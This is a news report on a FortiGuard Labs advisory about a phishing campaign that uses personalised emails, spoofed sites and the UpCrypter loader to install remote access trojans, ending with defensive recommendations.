A large-scale phishing operation has been uncovered by cybersecurity researchers, leveraging highly personalized emails and spoofed websites to trick victims into downloading malicious files.

According to a recent advisory from FortiGuard Labs, attackers are using a custom loader known as UpCrypter to deliver a variety of remote access tools (RATs), enabling persistent control over compromised systems.

How the Attack Unfolds

The campaign typically begins with phishing emails containing HTML attachments. When opened, these files redirect victims to fraudulent websites designed to appear legitimate. To strengthen credibility, the sites embed the recipient’s email address and in some cases display the company logo of the target organization.

Researchers have observed different lures being used, such as:

• Voicemail scams – Emails claiming the user missed a call, with an HTML file that silently redirects the browser to a phishing site.
• Purchase order fraud – Spoofed purchase requests in Chinese, with an attachment that builds a malicious URL leading to a counterfeit page.

Once redirected, victims are encouraged to download a ZIP archive containing an obfuscated JavaScript file. This script executes PowerShell commands, bypasses detection mechanisms, and retrieves additional payloads from attacker-controlled servers.

In some variants, steganography is employed, hiding data inside image files to evade security scans.

UpCrypter as the Core Delivery Mechanism

At the center of this campaign is UpCrypter, a loader actively maintained by its developer and even showcased on YouTube. Before execution, UpCrypter checks for forensic tools, virtual machines, or sandbox environments.

• If signs of analysis are detected, it forces a system reboot to disrupt investigations.
• Once validated, it downloads and runs additional components in memory while establishing persistence through registry modifications.

The final payloads identified so far include PureHVNC, DCRat, and Babylon RAT. These tools allow attackers to perform keylogging, credential theft, file exfiltration, and full remote control of infected systems.

Rapid Expansion Across Industries

FortiGuard Labs reported that detections of this campaign doubled within just two weeks, highlighting its rapid global spread. Targeted industries include manufacturing, technology, healthcare, construction, and retail/hospitality.

Unlike traditional phishing schemes aimed at stealing login credentials, this campaign demonstrates a multi-stage intrusion chain designed to implant sophisticated malware inside corporate networks.

Mitigation Recommendations

Researchers stress that organizations must take this threat seriously by implementing:

• Robust email filtering
• Network-level monitoring for PowerShell abuse
• User awareness training to help staff recognize and avoid phishing attempts

As Fortinet concluded:

“This is not a simple credential-harvesting campaign, but a complex attack delivering advanced malware. Organizations should adopt layered defenses to minimize risk.”

Source: https://www.infosecurity-magazine.com/news/phishing-upcrypter-deploy-rat